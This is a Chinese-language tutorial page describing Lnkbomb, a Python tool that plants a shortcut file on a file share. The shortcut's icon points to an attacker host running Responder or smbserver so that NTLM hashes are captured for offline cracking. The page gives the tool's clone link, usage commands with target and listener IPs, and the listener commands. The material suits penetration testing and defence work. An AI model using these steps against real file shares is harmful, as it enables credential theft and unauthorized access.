lnkbomb是一款功能强大的安全测试工具,旨在帮助研究人员通过生成安全测试用的快捷方式文件,并尝试从目标文件共享中收集ntlm哈希来评估文件共享的安全性。
工具运行机制
Lnkbomb首先生成一个用于测试的快捷方式文件,并将其上传到目标(不安全)的文件共享中。根据Windows操作系统的运行机制,Windows会寻找与该快捷方式文件相关联的图标文件。这个图标文件可以被定向到运行了Responder或smbserver等工具的安全测试设备上,从而实现NTLMv1或NTLMv2哈希的收集,这取决于目标主机的配置。随后,安全研究人员可以使用Hashcat等工具对收集的哈希进行离线破解。
在整个过程中,研究人员需要在Payload文件中写入目标设备的IP地址,然后通过命令行工具将Payload文件上传到目标文件共享中。
工具安装
Lnkbomb是基于Python 3开发的,因此需要在本地设备上安装并配置好Python 3环境。
接着,研究人员可以通过以下命令将项目源码克隆到本地:
git clone https://www.php.cn/link/f09b521ff0bbb06f43e79df86233e49c.git
请注意,该工具在Windows平台上可以正常运行,但在Linux平台上可能遇到一些问题。
工具使用
打开命令行工具,切换到项目根目录后,运行以下命令可以查看工具的帮助信息:
python3 lnkbomb.py -h
该命令将显示工具的帮助菜单,其中包含各种参数选项。
工具使用样例
样例1:
python3 lnkbomb.py -t \\192.168.1.1\Share -a 192.168.1.2
样例2:
python3 lnkbomb.py -r randomfilegenerated.recover
样例3: 如果需要使用Responder或smbserver等工具来捕捉NTLM哈希,可以运行以下命令:
responder -I eth0 -dwf -v
或者:
smbserver.py . . -smb2support
使用可执行文件
研究人员也可以从项目的【Releases页面】下载Lnkbomb的已编译可执行文件。所有运行参数选项和命令行工具的使用方法相同,只是运行时通过双击lnkbomb.exe文件来实现,而不是运行“python3 lnkbomb.py”命令。
工具运行截图


许可证协议
本项目的开发与发布遵循MIT开源许可证协议。
项目地址
https://www.php.cn/link/f09b521ff0bbb06f43e79df86233e49c
以上就是如何使用Lnkbomb测试文件共享的安全性的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号